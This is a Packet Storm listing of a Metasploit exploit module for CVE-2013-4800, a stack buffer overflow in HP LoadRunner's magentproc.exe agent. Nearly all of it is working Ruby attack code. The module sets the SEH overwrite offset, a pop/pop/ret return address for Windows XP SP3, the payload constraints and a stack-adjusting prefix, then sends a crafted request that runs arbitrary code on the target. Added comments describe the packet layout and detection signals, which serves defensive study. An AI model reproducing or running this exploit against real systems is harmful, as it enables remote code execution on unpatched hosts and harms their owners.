
HP LoadRunner magentproc.exe Overflow

2013-10-0700:00:00
juan vazquez
packetstormsecurity.com
27

0.967 High

EPSS

Percentile

99.6%

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
# Metasploit exploit module for CVE-2013-4800, a stack buffer overflow in the
# HP LoadRunner agent process (magentproc.exe); the description below states
# the issue affects LoadRunner before 11.52, so upgrading past that release is
# the vendor-side fix. Everything this class does is framework-driven: the
# Tcp mixin provides connect/sock/disconnect, the Seh mixin provides
# generate_seh_record, and rand_text/payload/target come from Msf::Exploit.
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
# Module metadata. The only values #exploit reads back out of this hash are
# the selected target's 'Offset', 'Ret' and 'Crash' entries; the 'Payload'
# constraints are consumed by the framework when it encodes the payload.
def initialize(info = {})  
super(update_info(info,  
'Name' => 'HP LoadRunner magentproc.exe Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The  
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending  
a specially crafted packet, an attacker may be able to execute arbitrary code.  
},  
'Author' =>  
[  
'Unknown', # Original discovery # From Tenable Network Security  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2013-4800'],  
['OSVDB', '95644'],  
['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']  
],  
'Privileged' => false,  
# The agent is reached over TLS (default RPORT 443, see register_options)
# and the SSL version is pinned to SSL3. NOTE(review): whether an agent that
# has SSLv3 disabled still accepts this connection cannot be told from this
# file; treat "SSLv3 still enabled on the agent port" as one exposure signal.
'DefaultOptions' =>  
{  
'SSL' => true,  
'SSLVersion' => 'SSL3',  
'PrependMigrate' => true  
},  
# Payload constraints: at most 4096 bytes, no NUL byte. The prepended bytes
# are the x86 instruction noted in the trailing comment (0xfffff254 as a
# signed 32-bit immediate is -3500), executed before the payload itself.
'Payload' =>  
{  
'Space' => 4096,  
'DisableNops' => true,  
'BadChars' => "\x00",  
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500  
},  
'Platform' => 'win',  
'DefaultTarget' => 0,  
# Single target. 'Offset' is the number of filler bytes written before the
# SEH record, 'Ret' the address placed in that record (a pop/pop/ret gadget
# per the inline comment), and 'Crash' the length of trailing filler.
'Targets' =>  
[  
[  
'Windows XP SP3 / HP LoadRunner 11.50',  
{  
# magentproc.exe 11.50.2042.0  
'Offset' => 1104,  
'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates  
'Crash' => 6000 # Length needed to ensure an exception  
}  
]  
],  
'DisclosureDate' => 'Jul 27 2013'))  
  
# Only the port is registered here; host, SSL and payload options come from
# the mixins and DefaultOptions above.
register_options([Opt::RPORT(443)], self.class)  
end  
  
# Builds one request and writes it to the agent in a single put; nothing is
# read back before disconnecting. On the wire the message is, in order:
#   - a 4-byte big-endian length field set to 0xffffffff,
#   - target['Offset'] (1104) bytes of random filler,
#   - the SEH record produced by generate_seh_record for target.ret,
#   - the encoded payload (bounded by 'Space'/'BadChars' above),
#   - target['Crash'] (6000) bytes of random filler.
# Detection note: the observable artefact is a first message on the agent port
# whose length prefix is 0xffffffff and whose size is roughly
# 1104 + payload + 6000 bytes (plus the SEH record), with the client closing
# right after sending.
def exploit  
  
req = [0xffffffff].pack("N") # Fake Length  
req << rand_text(target['Offset'])  
req << generate_seh_record(target.ret)  
req << payload.encoded  
req << rand_text(target['Crash'])  
  
connect  
print_status("Sending malicious request...")  
sock.put(req)  
disconnect  
  
end  
end  
`
